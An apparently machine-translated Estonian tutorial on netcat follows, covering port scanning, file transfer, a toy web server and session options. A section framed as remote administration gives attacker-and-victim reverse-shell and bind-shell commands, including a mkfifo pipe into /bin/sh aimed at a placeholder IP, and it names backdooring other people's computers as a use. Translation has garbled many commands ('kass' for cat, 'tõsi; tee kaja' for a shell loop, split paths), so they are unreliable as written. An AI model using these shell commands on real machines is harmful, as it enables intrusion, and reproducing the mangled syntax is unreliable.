Netcat on utiliit, mida kasutatakse andmete lugemiseks ja kirjutamiseks TCP- ja UDP-porti. Seda saab kasutada paljude lahedate asjade jaoks, nagu failiedastus, pordi skaneerimine, pordi ümbersuunamine, kellegi teise arvuti tagauksete paigaldamine, lihtsa vestlusprogrammi loomine, võrgu tõrkeotsinguks ja muuks, sellepärast on see tuntud kui Šveitsi armeenuga. Samuti on see eelinstallitud tänapäeval peaaegu kõigi Linuxi distributsioonidega ja seda kasutavad peamiselt võrguadministraatorid, DevOps ja turvainsenerid oma igapäevaste väikeste ülesannete täitmiseks.

Lühike erinevus netcat-traditsioonilise ja netcat-openbsd vahel

Netcati jaoks on saadaval kaks sarnast paketti, nende vahel on väike erinevus.

netkass-traditsiooniline sisaldab täiendavat valikut '-e', mida saab kasutada programmi sidumiseks (st.e bash) võrgukassiga. See funktsioon on kaughalduse jaoks väga kasulik.

netcat-openbsd on mõningane täiendav tugi IPv6 ja puhverserveritele.

Netcati installimine

Kuigi netcat on enamikus Linuxi distributsioonides eelinstallitud, kuid kui seda pole, saab selle järgmiste käskude abil hõlpsasti installida.

Traditsioonilise pakendi jaoks,

[meiliga kaitstud]: ~ $ sudo apt-get install netcat-traditional

OpenBSD versiooni jaoks,

[meiliga kaitstud]: ~ $ sudo apt-get install netcat-openbsd

Netcati Windowsi jaoks saab alla laadida siit https: // sourceforge.net / projektid / nc110 / failid /.

Nüüd uurime mõningaid huvitavaid netcati kasutamise juhtumeid

Pordi skaneerimine netcati abil

Avatud portide otsimiseks kasutage valikut '-z'. Netcat püüab UDP korral ühendada iga pordiga ilma andmeid või väga piiratud andmeid saatmata. Sisestage järgmine

[meiliga kaitstud]: ~ $ nc -z -v hackme.org 80
... jupp ..
hackme.org [217.78.1.155] 80 (http) avatud

Pordivahemiku otsimiseks tippige

[meiliga kaitstud]: ~ $ nc -z -nv 192.168.100.72 20–80
(Tundmatu) [192.168.100.72] 80 (http) avatud
(Tundmatu) [192.168.100.72] 22 (ssh) avatud

Failiedastus netcatiga

Teine kasulik netcati kasutusjuht on failide edastamine kaugarvutite vahel. Tekste ja binaarfaile saate saata ühest arvutist teise arvutisse. Püüame saata faili “fail.pdf ”Linuxi arvutist Windowsi arvutisse [IP 192.168.100.72] kasutades näiteks netcati.

Tippige Windowsi masinasse (vastuvõtjas) järgmine

C: \ Kasutajad> nc -nvlp 1337> fail.pdf
Kuulamine saates [0.0.0.0] (perekond 2, sadam 1337)

Linuxi masinasse (saatja) tippige järgmine

[meiliga kaitstud]: ~ $ nc -nv 192.168.100.72 1337 < file.pdf
Ühendus 192-ga.168.100.72 1337 port [tcp / *] õnnestus!

Kaughaldus koos netcatiga

Netcati üks parimaid kasutusjuhtumeid on kaughaldus, see tähendab, et saate juhtida kellegi teise arvutit netcati abil. Netcat-traditional sisaldab valikut '-e', mida saab kasutada programmi sidumiseks (st.e cmd.exe Windowsis või bash Linuxis) koos pordiga, see tähendab, et netcat toimib programmi ja kaugarvuti vahel suhtlejana. Netcat võtab vastu käske kaugarvutist, täidab kohalikus süsteemis ja saadab tulemused kaugarvutisse tagasi. Seda funktsiooni kasutatakse laialdaselt pahatahtlikel eesmärkidel, arvutite ja serverite tagauste hoidmiseks. See funktsioon on saadaval ainult traditsioonilises netcat-versioonis, kuid väikese nipiga saab netcat-openbsd kasutada ka samal eesmärgil. Teiste arvutite juhtimiseks võite kasutada kahte viisi.

Sees Tagurpidi kest ühendus, kuulab ründaja sadamat ja ootab ohvrimasinast ühenduse saamist. Seda kasutatakse juhul, kui ohvriarvuti on NAT-i taga või tal pole avalikku IP-d.

Netcati abil vastupidise kesta saamiseks peate kuulama netcati abil pordis. Sisestage ründaja masinasse järgmine,

[meiliga kaitstud]: ~ $ nc -nvlp 1337
Kuulamine saates [0.0.0.0] (perekond 2, sadam 1337)

Ohvri masinal (kui netkass-traditsiooniline on installitud)

// asendage “/ bin / bash” tekstiga “cmd.exe ”Windowsi puhul

[meiliga kaitstud]: ~ $ nc -nv [IP_ADDR] 1337 -e / bin / bash

Sest netcat-openbsd (kus valikut „-e” ei toetata)

[meiliga kaitstud]: ~ $ rm / tmp / f; mkfifo / tmp / f; kass
/ tmp / f | / bin / sh -i 2> & 1 | nc [IP_ADDR] 1337> / tmp / f

Ajal olles Seo kest Ühendab ründaja ohvrimasinas oleva pordi ja loob ühenduse kliendipesa abil. Seda kasutatakse juhul, kui ründaja masin on NAT-i taga või tal pole avalikku IP-d.

Ohvri masinal tippige

[meiliga kaitstud]: ~ $ nc -nlvp 1337 -e / bin / bash
kuulab [mis tahes] 1337-d ..

Nüüd ohvri masinas käskude käivitamiseks tippige

[kaitstud meiliga]: ~ $ nc -nv 127.0.0.1 1337
Ühendus 127-ga.0.0.1 1337 port [tcp / *] õnnestus!
$ id
uid = 1000 (asad) gid = 1000 (asad) rühma = 1000 (asad), 4 (adm), 24 (cdrom), 27 (sudo),
30 (dip), 46 (plugdev), 118 (lpadmin), 129 (sambashare)

Netcati kasutav lihtne veebiserver

Võite teha ka teise lihtsa triki, et kasutada netcati minimaalselt ühe lehega veebiserverina. See veebiserver oleks väga lihtne, ilma eriliste seadistusteta ja me kasutame selleks HTML-koodi brauserisse saatmist.

[meiliga kaitstud]: ~ $ tõsi; tee kaja -e "HTTP / 1.1 200 OK \ n \ n $ (kaja "

Minu lihtne veebiteenus, mis kasutab netcati

")" | nc-nvlp 1337; tehtud
Kuulamine saates [0.0.0.0] (perekond 2, sadam 1337)

Proovige nüüd veebileht tuua lokkimist kasutades

[meiliga kaitstud]: ~ $ curl http: // 127.0.0.1: 1337 /

Minu lihtne veebiteenus, mis kasutab netcati

Määrake netcati seansi aegumine

Netcati seansi ajalõpu saate määrata, kasutades valikut “-w”. Netcat katkestab seansi automaatselt pärast määratud aja möödumist.

// -w [aeg sekundites]
[meiliga kaitstud]: ~ $ nc -w 40 -nvlp 1337
Kuulamine saates [0.0.0.0] (perekond 2, port 1234)

Jätkake kuulamist, isegi kui klient sulgeb ühenduse

Tavarežiimis lülitab netcat server välja ja lõpetab pordi kuulamise, kui klient ühenduse katkestab. Serverit saate üleval hoida, kasutades valikut “-k”

[meiliga kaitstud]: ~ $ nc -k -nlvp 1234
Kuulamine saates [0.0.0.0] (perekond 2, port 1234)

Järeldus

Netcat on lihtne, kuid tõhus utiliit, mida saab kasutada paljude igapäevaste ülesannete täitmiseks. See on eelinstallitud peaaegu igasse UNIX-i nagu operatsioonisüsteemidesse ja seda saab kasutada mitmesuguste ülesannete täitmiseks, näiteks kahe arvuti vaheliseks suhtlemiseks, failiedastuseks ja paljuks muuks.